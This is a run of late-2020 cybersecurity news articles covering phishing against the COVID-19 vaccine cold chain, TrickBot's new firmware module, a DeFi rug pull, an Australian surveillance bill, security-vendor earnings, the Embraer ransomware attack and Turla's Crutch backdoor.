Information Technology

IBM’s cyber-security division says that hackers are targeting companies associated with the storage and transportation of COVID-19 vaccines using temperature-controlled environments — also known as the COVID-19 vaccine cold chain.

The attacks consisted of spear-phishing emails seeking to collect credentials for a target’s internal email and applications.
While IBM X-Force analysts weren’t able to link the attacks to a particular threat actor, they said the phishing campaign showed the typical “hallmarks of nation-state tradecraft.”
Government agencies and private companies targeted alike
Targets of the attacks included a wide variety of companies, sectors, and government organizations. This included the European Commission’s Directorate-General for Taxation and Customs Union, an organization that monitors the movement of products across borders — including medical supplies.
The attackers also targeted a company that manufactures solar panels used for solar-powered vaccine transport refrigerators and a petrochemical company that manufactures dry ice, also used for vaccine transportation.
Further, the same threat actor also targeted a German IT company that makes websites for “pharmaceutical manufacturers, container transport, biotechnology and manufacturers of electrical components enabling sea, land and air navigation and communications.”
Also: MIT machine learning models find gaps in coverage by Moderna, Pfizer, other Warp Speed COVID-19 vaccines 

According to IBM, the attackers specifically targeted select executives at each company, usually individuals working in sales, procurement, IT, and finance positions, which were likely to be involved in company efforts to support a vaccine cold chain.
The selected targets typically received emails using the spoofed identity of a business executive from Haier Biomedical, a Chinese company which is part of the UN’s official Cold Chain Equipment Optimization Platform (CCEOP) program.
“The subject of the phishing emails posed as requests for quotations (RFQ) related to the CCEOP program,” IBM researchers Melissa Frydrych and ClaireZaboeva said in a report today.

Image: IBM
The emails contained malicious HTML files as attachments that victims had to download and open locally. Once opened, the files prompted victims to enter various credentials to view the file.
“This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement.” 
All in all, companies in Germany, Italy, South Korea, Czech Republic, greater Europe, and Taiwan were targeted in this campaign.
COVID-19 companies repeatedly targeted in recent months 
But this phishing operation is just the latest in a long list of different attacks by different threat actors that targeted the COVID-19 vaccine research field this year.
Previous targets included Johnson & Johnson, Novavax, Genexine, Shin Poong Pharmaceutical, Celltrion, according to the Wall Street Journal, and AstraZeneca and Gilead, according to Reuters.
Some of the attacks have been linked back to the governments of China, Iran, Russia, and North Korea.
However, while the previous attacks targeted the vaccine makers directly, this particular campaign was different because it targeted their supply chain — suggesting threat actors are also looking for information on how to transport and store vaccines, and not only how to make it.
The US Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency are scheduled to release a security alert later today about the phishing campaign spotted by IBM.
The joint FBI and CISA alert comes after Interpol published a different security alert on Wednesday to warn that organized crime syndicates, active both in the real world and online, are most likely to infiltrate and disrupt vaccine supply chains for their own financial profits.
Several pharmaceutical companies have announced this fall that they’ve developed successful COVID-19 vaccines, most of which are expected to enter broad distribution in early 2021 — if their supply chains don’t get disrupted. More

The operators of the TrickBot malware botnet have added a new capability that can allow them to interact with an infected computer’s BIOS or UEFI firmware.

The new capability was spotted inside part of a new TrickBot module, first seen in the wild at the end of October, security firms Advanced Intelligence and Eclypsium said in a joint report published today.
The new module has security researchers worried as its features would allow the TrickBot malware to establish more persistent footholds on infected systems, footholds that could allow the malware to survive OS reinstalls.
In addition, AdvIntel and Eclypsium say the new module’s features could be used for more than just better persistence, such as:
Remotely bricking a device at the firmware level via a typical malware remote connection.
Bypassing security controls such as BitLocker, ELAM, Windows 10 Virtual Secure Mode, Credential Guard, endpoint protection controls like A/V, EDR, etc.
Setting up a follow-on attack that targets Intel CSME vulnerabilities, some of which require SPI flash access.
Reversing ACM or microcode updates that patched CPU vulnerabilities like Spectre, MDS, etc.
But the good news is that “thus far, the TrickBot module is only checking the SPI controller to check if BIOS write protection is enabled or not, and has not been seen modifying the firmware itself,” according to AdvIntel and Eclypsium.
“However, the malware already contains code to read, write, and erase firmware,” the two companies added.
Researchers say that even if the feature has not been deployed to its full extent just yet, the fact that the code is present inside TrickBot suggests its creators plan to use it in certain scenarios.

Appropriate cases may include the networks of larger corporations where the TrickBot gang may not want to lose access and may want to leave behind a more powerful boot-level persistence mechanism.
This module could also be used in ransomware attacks, in which the TrickBot gang is often involved by renting access to its network of bots to ransomware crews.

Image: AdvIntel
If companies who had their networks encrypted refuse to pay, the TrickBot module could be used to destroy their systems, AdvIntel and Eclypsium said.
Or the module could also be used to prevent incident responders from finding crucial forensic evidence by crippling a system’s ability to boot-up.
“The possibilities are almost limitless,” AdvIntel and Eclypsium said, highlighting TrickBot’s many different areas where it also helps its customers operate.

Image: AdvIntel
Feature powered via publicly available code
But the addition of this feature to the TrickBot code also marks the first time that UEFI/BIOS tampering capabilities are seen in common financially-motivated malware botnets.
Prior to today’s report, the only malware strains known to have the ability to tamper with UEFI or BIOS firmware were LoJax or MosaicRegressor.
Both are malware strains developed by government-sponsored hacking groups — LoJax by Russian hackers and MosaicRegressor by Chinese hackers.
But according to Eclypsium, a company specializing in firmware security, the TrickBot gang didn’t develop its code from scratch. Its analysis suggests the gang has instead adapted publicly available code into a specialized module they could install on infected systems via the first-stage TrickBot loader.
“Specifically, TrickBot uses the RwDrv.sys driver from the popular RWEverything tool in order to interact with the SPI controller to check if the BIOS control register is unlocked and the contents of the BIOS region can be modified,” Eclypsium said.
“RWEverything (read-write everything) is a powerful tool that can allow an attacker to write to the firmware on virtually any device component, including the SPI controller that governs the system UEFI/BIOS,” Eclypsium said. “This can allow an attacker to write malicious code to the system firmware, ensuring that attacker code executes before the operating system while also hiding the code outside of the system drives.”
New feature added after failed takedown attempt
But the timing in the discovery of this new TrickBot feature is also something to take note of. It comes as TrickBot is slowly coming back to life after a failed takedown attempt.
Over the past few weeks, TrickBot operations have seen a flurry of updates, from new obfuscation techniques, new command-and-control infrastructure, and new spam campaigns.

All of these updates are aimed at reviving and shoring up one of today’s largest cybercrime-as-a-service botnet operations, which in its heyday, was controlling more than 40,000 infected computers each day.
Sherrod DeGrippo, Senior Director for Threat Research and Detection at Proofpoint, told ZDNet that Proofpoint “has not observed a significant change in the Trick volumes despite the disruptive activities by US Cyber Command and the Microsoft-led coalition.”
For now, TrickBot doesn’t only appear to have survived the takedown attempt, but is actually coming back to life with stronger features than before.
“Every actor responds to changes in their operational environment differently,” DeGrippo added.
“[TrickBot] has demonstrated that its botnet is resilient to disruptive actions by governments and security vendors; however, it is not immune to future disruption. We anticipate a higher velocity of infrastructure changes and malware updates to occur in the near term.” More

An exit scam allegedly performed by Compounder Finance DeFi developers has left investors $11 million out of pocket. 

Compounder Finance called itself a “smarter farming” platform and a Harvest/Yearn Finance clone, as first reported by CoinDesk. 
At the time of writing, the project’s website, Twitter, Medium, and Discord pages appear to have been deleted. 
According to a cached version of a Medium blog post describing the project, dated November 8, Compounder Finance claimed to be an automated farming system offering compound interest on digital assets while also earning native CP3R tokens as a “reward.”
See also: Chainalysis launches program to manage cryptocurrency seized by law enforcement
“We will examine yields, security and complexity of new pools that will keep our stakers comfortable knowing they have a competitive edge to other farmers. We hope to offer the next generation of high-interest returns,” the developers claimed. 
Pools supported ETH, DAI, USDT, and USDC.

Compounder Finance, having only launched last month, promised investors that the Ethereum-based decentralized finance (DeFi) project implemented 24-hour time locks on all smart contracts imposed in the interest of safety, but what wasn’t known is that the developers allegedly included a hidden backdoor into the system. 
In a ‘rug-pull,’ otherwise known as the unexpected removal of liquidity from a token, once the platform had secured enough funding from eager investors, roughly $10.8 million in wrapped Bitcoin (WBTC), ETH, DAI, and other tokens was transferred out of the project. 
DefiYield, a Twitter user that claims to have lost $1 million in investment due to the rug pull, has offered a $100,000 reward for any information leading to the identity of the threat actor, or any means to return stolen funds to victims. 
“As this is a substantial loss for me and many more crypto farmers, I will keep going on with the investigation and pushing the authorities now and in the coming years, until there will be a positive result,” the investor said. 
CNET: Google researcher demonstrates iPhone exploit with Wi-Fi takeover
A Telegram group has also been created for impacted investors to explore their legal options.
Solidity Finance previously audited the project (.PDF) for external threat potential and flagged the suspicious time-locked smart contract setup, as well as the control maintained by the central development team. 
Malicious strategy contracts were added after the audit, allowing the rug pull deployer to withdraw funds. 
TechRepublic: Sales of CEO email accounts may give cyber criminals access to the “crown jewels” of a company
Together with @vasa_develop from Stake Capital, a post-mortem report on the rug pull has now been published.
“The Compounder team swapped the safe/audited Strategy contracts and replaced them with malicious ‘Evil Strategy’ contracts that allowed them to steal user funds,” Solidity Finance said. “They did this through a public, though clearly unmonitored, 24-hour timelock. The team had the power to update strategy pools and they did so maliciously here.”
At the time of writing, the CP3R token is worth $0.34, down from $80.18 on November 25.
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Image: APH
The Australian government has put forward its Surveillance Legislation Amendment (Identify and Disrupt) Bill 2020 that would hand the Australian Federal Police (AFP) and the Australian Criminal Intelligence Commission (ACIC) three new warrants for dealing with online crime.
The first warrant is a data disruption warrant, which according to the Bill’s explanatory memorandum is intended to be used to prevent “continuation of criminal activity by participants, and be the safest and most expedient option where those participants are in unknown locations or acting under anonymous or false identities”.
The second is a network activity warrant that would allow the AFP and ACIC to collect intelligence from devices that are used, or likely to be used, by those subject to the warrant.
“This means that data does not have to be stored on the devices, but can be temporarily linked, stored, or transited through them,” the memorandum states.
“This will ensure data that is unknown or unknowable at the time the warrant is issued can be discovered, including data held on devices that have disconnected from the network once the criminal activity has been carried out.”
The last warrant is an account takeover warrant that will allow the agencies to take control of an account for the purposes of locking a person out of the account.
“Any other activities, such as accessing data on the account, gathering evidence, or performing undercover activities such as taking on a false identity, must be performed under a separate warrant or authorisation,” the memorandum said.

“Those actions are not authorised by an account takeover warrant. The account takeover warrant is designed to support existing powers, such as computer access and controlled operations, and is not designed to be used in isolation.”
Agencies would need to report twice a year to the Commonwealth Ombudsman and the Minister for Home Affairs on the use of takeover warrants.
If the Bill is passed, the first two warrants will be able to be issued by the Administrative Appeals Tribunal (ATT) or a suitable judge, while the takeover warrant would need approval by a magistrate.
Citing the use of network activity warrants as an intelligence tool, the Inspector-General of Intelligence and Security will also be responsible for overseeing those warrants instead of the Commonwealth Ombudsman. Disclosing information on those warrants could incur two years jail, while disclosing information that harms an investigation or endangers a person is a 10-year offence.
The Bill also introduces assistance orders to go some way to fulfilling the misplaced fears many had over dragooning when the Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018 was introduced. 
Agencies will be able to ask an AAT member or judge to force a specified person to help them.
“This item ensures that should the AFP or the ACIC be issued a data disruption warrant, they will be able to compel assistance in accessing devices, accessing and disrupting data, copying data, and converting documents,” the memorandum states.
“The intent of this provision is not to allow law enforcement to compel assistance from industry, but rather from a person with knowledge of a computer to assist in disrupting data (such as a person who uses the computer).”
However, in a subsequent example, the memorandum points out that people who are not the subject of a warrant could receive an assistance order as well.
“The AFP or the ACIC may have been issued a data disruption warrant for the purposes of targeting a user of a child exploitation forum hosted on a web service. In the course of executing the warrant, they become aware of a system administrator who has knowledge of how to access the forum but is not necessarily involved in the conduct on the forum,” the memorandum explains.
“The AFP or the ACIC could use this knowledge by obtaining an assistance order under new section 64B and compelling the administrator to assist them by providing access. This assistance could then be used to facilitate disruption activities such as a data modification.”
Failing to comply with an assistance order is punishable by a maximum of 10 years in jail.
In its opening, the memorandum said existing powers are not suitable for use on targets who are “actively seeking to obscure their identity and the scope of their activities”.
“Cyber-enabled serious and organised crime, often enabled by the dark web and other anonymising technologies, such as bespoke encrypted devices for criminal use, present a direct challenge to community safety and the rule of law,” the memorandum says.
“Many anonymising technologies and criminal methodologies can be combined for cumulative effect, meaning it is technically difficult, and time and resource intensive, for law enforcement to take effective action.
“Just as online criminals are constantly changing their operations and reacting to new environments, the law must adapt in order to give law enforcement agencies effective powers of response.”
The Bill was introduced to Parliament on Thursday by Minister for Home Affairs Peter Dutton.
Related Coverage More

CrowdStrike published third quarter financial results on Wednesday, handily beating market expectations. The company’s non-GAAP net income per share was 8 cents on revenue of $232.5 million, an 86% increase year-over-year.

Analysts were expecting EPS of zero cents per share on revenue of $212.6 million. Shares of CrowdStrike were up more than 12% in after hours trading. 
Subscription revenue was $213.5 million, an 87% increase. Annual Recurring Revenue (ARR) increased 81% year-over-year and grew to $907.4 million as of October 31. Of that, $116.8 million was net new ARR added in the quarter.
Meanwhile, the company said it added 1,186 net new subscription customers in the quarter for a total of 8,416 subscription customers at the end of Q3, representing 85% growth year-over-year. CrowdStrike’s subscription customers that have adopted four or more cloud modules increased to 61%, and those with five or more cloud modules increased 44%.
“Broad-based demand and strength in multiple areas of the business fueled our rapid 87% year-over-year subscription revenue growth, record net new ARR and record net new subscription customers,” said CrowdStrike CEO George Kurtz. “CrowdStrike’s robust growth at scale underscores our growing leadership in the Security Cloud category and the immense value we deliver to customers seeking to transform, consolidate and fortify their security posture.”
For the fourth quarter, CrowdStrike expects revenue in the range of $245.5 million to $250.5 million, with earnings between 8 cents and 9 cents per share. Wall Street expects the company to report Q4 earnings of a penny per share on revenue of $230.3 million.

Tech Earnings More

Okta, the eleven-year-old, San Francisco-based maker of software to secure enterprise identities and authorize computer usage, this afternoon reported fiscal third-quarter revenue and profit that both topped expectations, and offered a forecast for revenue that beat expectations as well.
CEO Todd McKinnon called the results “strong,” and added that the company is “seeing the importance of a modern identity platform like the Okta Identity Cloud grow as businesses around the world accelerate their adoption of cloud-based applications and re-imagine their digital customer experiences,” 
For the three months ended in October, Okta reported revenue of $217 million and 4 cents per share in net profit.
That compares to the average Street estimate for $202.8 million in revenue a net loss of one penny per share. 
Okta said its remaining performance obligation, or RPO, a standard Wall Street measure for cloud companies’ future revenue potential, rose by 53% in the quarter to reach $1.58 billion.  
Free cash flow in the quarter quadrupled, year over year, to $41.6 million, equating to just over 19% of revenue, the company said.   
For the current quarter, the company sees revenue of $221 million to $222 million, above the average Wall Street estimate for $216 million.  

Okta shares are up about 7% in late trading.

Tech Earnings More

Brazilian aerospace and defence group Embraer has been targeted by a cyberattack that has impacted the company’s operations.
According to a statement released by the global firm on Monday (30) the attack resulted in the “disclosure of data allegedly attributed to the company”.
The incident was reported five days after it took place to the Brazilian Securities and Exchange Commission. The Brazilian legislation requires immediate reporting of problems such as cyber attacks.
The cyberattack was identified on November 25, 2020, and access to a single systems environment of the company was unavailable as a result, according to the Embraer statement.
As a consequence of the attack internal systems have suffered a partial and temporary interruption, which temporarily impacted some operations.
According to Brazilian newspaper O Globo, the incident in question was a ransomware attack, which required the deactivation of a significant share of the servers operated by the company, which is currently operating under a contingency plan, with enhanced security.
An investigation is being carried out to ascertain the origin and consequences of the attack, the Embraer statement noted.

“The company is making every effort to investigate the circumstances of the attack, assess whether any potential impact on its business and third parties, and determine the measures to be taken,” it added.
The Embraer news follow another major security incident in the Latin American country: the Brazilian Superior Court of Justice was hit last month by a major cyberattack that disrupted operations for more than two weeks.
According to the president of the Superior Court, minister Henrique Martins, the event was “the worst-ever” cyberattack that a Brazilian government body has suffered, both in terms of the dimension and complexity involved. More

A cyber espionage campaign is targeting the foreign ministry of a country in the European Union with the aid of a previously undocumented form of malware which provides a secret backdoor onto compromised Windows systems.
Uncovered by cybersecurity researchers at ESET, the tools are designed to steal sensitive documents and other files by secretly exfiltrating them via Dropbox accounts controlled by the attackers.
Dubbed Crutch by its developers, this malware campaign has been active from 2015 through to 2020 and researchers have linked it to the Turla hacking group, due to similarities with previously uncovered Turla campaigns such as Gazer. The working hours of the group also coincide with UTC+3, the timezone which Moscow sits in. The UK’s National Cyber Security Centre (NCSC) is among those which has attributed Turla – also known as Waterbug and Venomous Bear – to Russia. 
The newly detailed Crutch campaign appears tailored towards very specific targets with the aim of stealing sensitive documents. ESET hasn’t revealed any specifics about the target, aside from that it was a ministry of foreign affairs in an EU country. This targeting fits in with previous Turla campaigns.
SEE: Cybersecurity: Let’s get tactical (ZDNet/TechRepublic special feature) | Download the free PDF version (TechRepublic)   
However, Crutch isn’t a first-stage payload and is only deployed after cyber attackers have already compromised the target network – something which similar campaigns to this have achieved by using specially crafted spear-phishing attacks.
Once Crutch is installed as a backdoor on the target system it communicates with a hardcoded Dropbox account which it uses to retrieve files while remaining under the radar because Dropbox is able to blend into normal network traffic.

Analysis of the backdoor indicates that it has repeatedly been updated and changed over the years in order to maintain effectiveness while also keeping hidden.
“The main malicious activity is exfiltration of documents and other sensitive files. The sophistication of the attacks and technical details of the discovery further strengthen the perception that the Turla group has considerable resources to operate such a large and diverse arsenal,” said Matthieu Faou, malware researcher at ESET.
However, despite the persistent nature of the attack by what’s regarded as a sophisticated hacking operation, there’s still some relatively simple security measures that organisations can apply to avoid falling victim to this or many other forms of cyber attack.
“During this investigation, we noticed that attackers were able to move laterally and compromise additional machines by reusing admin passwords,” said Fauo.
“I believe that limiting lateral movement possibilities would greatly make the life of attackers harder. It means preventing users being able to run as admin, using two factor authentication on admin accounts and using unique and complex passwords,” he added.
READ MORE ON CYBERSECURITY More